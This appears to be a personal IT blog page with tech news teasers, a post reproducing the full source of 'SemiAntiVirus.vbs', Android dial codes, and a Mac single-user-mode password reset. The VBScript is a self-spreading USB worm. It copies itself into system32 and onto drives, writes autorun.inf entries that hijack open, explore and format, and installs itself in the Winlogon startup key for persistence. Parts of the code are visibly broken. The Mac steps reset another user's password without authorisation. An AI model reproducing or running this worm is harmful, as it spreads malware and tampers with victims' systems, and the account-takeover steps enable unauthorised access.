Nvidia releases the next Titan, the GTX Titan Black

Last year, Nvidia hoped to change the graphics card game when it released the GTX Titan, a high-performance, energy efficient card. Now, Nvidia has released an new model of the Titan, the GTX Titan Black.

Defending the Earth from asteroids with high-powered nuclear explosions

Just over a year ago, the Chelyabinsk meteor entered Earth’s atmosphere, streaked across the southern Urals, and detonated in a fireball that was briefly brighter than the sun.

Happiness is a warm iGun: Dumb gun requires smart watch to shoot.

Gun company Armatix hopes to take the smart device industry by storm with its new smart gun system.

Flappy Bird’s removal from the app store: A case for piracy

Flappy Bird’s developer, Dong Nguyen, has broken his radio silence to say that he pulled the game for the sake of your well-being.

Metal Gear Solid

Metal Gear Solid 5 runs at 1080p on PS4, limited to 720p on Xbox One. The PS3, Xbox 360, PS4, and Xbox One will all receive versions of this game, and it seems as if the difference between each console is incredibly stark.

Saturday, February 15, 2014

SemiAntiVirus.vbs, the VB code that went viral around 4-5 years back !

Here is the script if any one is interested.

This is the auto run file

open=wscript.exe SemiAntiVirus.vbs
action=Open folder to view files
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs

Note: Now you cannot be assured that formatting an affected USB drive is a safe way to get rid of viruses etc. For example, this virus gets into the computer in 5 methods as the above code suggests

2. Using Autoplay feature
3. Exploring(right click and select explore)
4.Searching for the files saved in the USB drive
5. formatting


The actual virus script which can be found in c:windows\system32\semiantivirus.vbs

To tell the truth, i do not understand a single line of this coding(except the italicized part which has a good sense of humor) but hope it would help the computer geeks in finding a solution

Important: please do not use this information for unethical purposes

'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program. 
' If u want them, then u can contact me.

'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe

'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs

Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf

crvbs SystemDir,"SemiAntiVirus.vbs"

Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"



delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If

if Count <> 1 then
Wscript.sleep 2000
end if

loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)

For Each oFile In oFolder.Files
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
End sub

sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub

sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub

sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if

End sub


  1. For IMEI Number: *#06#
  2. For RAM Memory version: *#*#3264#*#*
  3. For FTA SW version: *#*#1111#*#*
  4. For FTA HW version: *#*#2222#*#*
  5. For Touchscreen version: *#*#2663#*#*
  6. View Phone Lock Status: *#7465625#
  7. Executes Emergency Dial Screen to unlock PUK Code: **05**#
  8. Enables Voice Dialing Logging Mode: *#*#8351#*#*
  9. Disables Voice Dialing Logging Mode: *#*#8350#*#*
  10. Change behavior of Power button: *#*#7594#*#*
  11. To test Vibration and Back-light of device: *#*#0842#*#*
  12. To test Proximity/Distance Sensor: *#*#0588#*#*
  13. To test Touchscreen: *#*#2663#*#*
  14. For Audio Test: *#*#0289#*#* or *#*#0673#*#*
  15. To launch Service Mode: *#*#197328640#*#*
  16. Hidden Service Menu (Motorola Droid): ##7764726
  17. Field Test: *#*#7262626#*#*
  18. To format the phone: *2767*3855#
  19. To start GTalk Monitoring: *#*#8255#*#*
  20. To get PDA, Phone, H/W and RF Call Date: *#*#4986*2650468#*#*
  21. Displays Build Time and Change List number: *#*#44336#*#*
  22. Packet Loopback Test: *#*#0283#*#*
  23. LCD Display Test: *#*#0*#*#*
  24. Enter Service Menu (on New Phones): *#0*#
  25. Diagnostic Configuration: *#9090#
  26. USB Logging Control: *#872564#
  27. System Dump Mode: *#9900#
  28. To test Bluetooth: *#*#232331#*#*
  29. To display Bluetooth Physic Address: #*#232337#*#
  30. To test secret GPS: *#*#1472365#*#*
  31. To test other GPS: *#*#1575#*#*
  32. To test WiFi/Wireless LAN of phone: *#*#232339#*#* or *#*#528#*#* or *#*#526#*#*
  33. To display Wi-Fi MAC Address:*#*#232338#*#*
  34. To Restore Factory Settings:*#*#7780#*#*
  35. To create Immediate backup of your multimedia files: *#*#273282*255*663282*#*#*
  36. To display Phone Information: *#*#4636#*#*
  37. To get detailed Camera Information: *#*#34971539#*#*
  38. For Software & Hardware Information: *#12580*369#
  39. To display HSDPA/HSUPA Control Menu: *#301279#

Ever lost ur MAC Password??? Its easy to recover...

Reebot ur machine and Press Command + S key while rebooting.

Leopard or below, type the following commands, hitting Enter after each one and waiting for the prompt to come up again before running the next one:

/sbin/fsck -fy
/sbin/mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
dscl . -passwd /Users/rajkumar password

If the Mac is running Lion or above, you'll instead want to use the following commands:

/sbin/fsck -fy
/sbin/mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist
dscl . -passwd /Users/rajkumar password

Replace rajkumar with the user whose account you want to access and password with the new password you want to assign to that user. If you get an error message about com.apple.DirectoryServicesLocal.plist on a Lion or Mountain Lion machine, just ignore it—the password reset should have still worked.

A Warm Welcome

Welcome you all guys in my blog. Well, i just started blog from, i hope i get y'all support to continue and get success of providing y'all solution with all the IT related problems and question..

With Regards,
Rajkumar Ghale